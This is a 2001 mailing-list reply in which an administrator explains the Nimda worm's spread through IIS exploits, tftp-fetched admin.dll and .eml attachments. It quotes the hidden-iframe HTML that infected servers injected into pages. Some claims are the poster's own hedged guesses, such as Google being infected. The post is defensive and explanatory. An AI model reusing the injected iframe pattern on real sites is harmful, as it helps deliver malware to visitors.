What you have got there is one of the latest self propogating viruses,
it can be read about at http://www.cert.org/advisories/CA-2001-26.html
What it does (for those that cant be bothered reading the advisory. Is
scan through your subnet (class c, b, or a) and for each IP it finds it
tried to do about 16 different IIS exploits, once you get infected via
that, it will attempt to tftp a file called admin.dll to your box, and
then execute it, once you get that, you are the not-so-proud owner of a
infected Windows nt/2000 server that will try to spawn more copies of
itself by that exact same method.
Also, once you are infected, your web server will attatch something.eml
to every web page that it serves. and this .eml file will do the same
thing, i.e. perform a few registry hacks, and possibly download
admin.dll, i am not totally sure on this though, i understand roughly
how it works, but not in any exacting detail. Currently www.google.com
is even infected by this self propogating virus.
There are patches for it out there, but this virus has hit very hard, it
will slow your link down regardless of your platform, as once infected,
a system will shoot out a massive number of requests. As a example of
this, one of our clients bad request logs for the past 24 hrs here have
shot up by something in the region of 60 times larger than those from 72
hours ago. This may also be a problem affecting one of the earlier posts
to this list (port 80 not resolving. from 'Michael Wilcox').
Regards
Michael Sim
Jeff wrote:
> I viewed the default web page on a machine known to be infected with Code
> Red II. In doing so, another browser window that appeared to be blank
> popped open, and the address in the title bar the name 'readme.eml'
> appeared. When I viewed the source of the page, this is the code that was
> contained there in-- attached as 'readme.txt' just in case it is malicious
> and would affect others using MS Outlook to read this.
>
> Can anybody tell me what purpose this might serve?
>
> ------------------------------------------------------------------------
>
> <HTML><HEAD></HEAD><BODY bgColor=#ffffff>
> <iframe src=cid:EA4DMGBP9p height=0 width=0>
> </iframe></BODY></HTML>
--
Michael Sim
System/Network Administrator
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Mobile: +61 (0)413 417 822 Level 1, 3 Montague St
Phone: +61 (0)2 9555 5666 Balmain NSW
Fax: +61 (0)2 9555 5688 Australia 2041
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
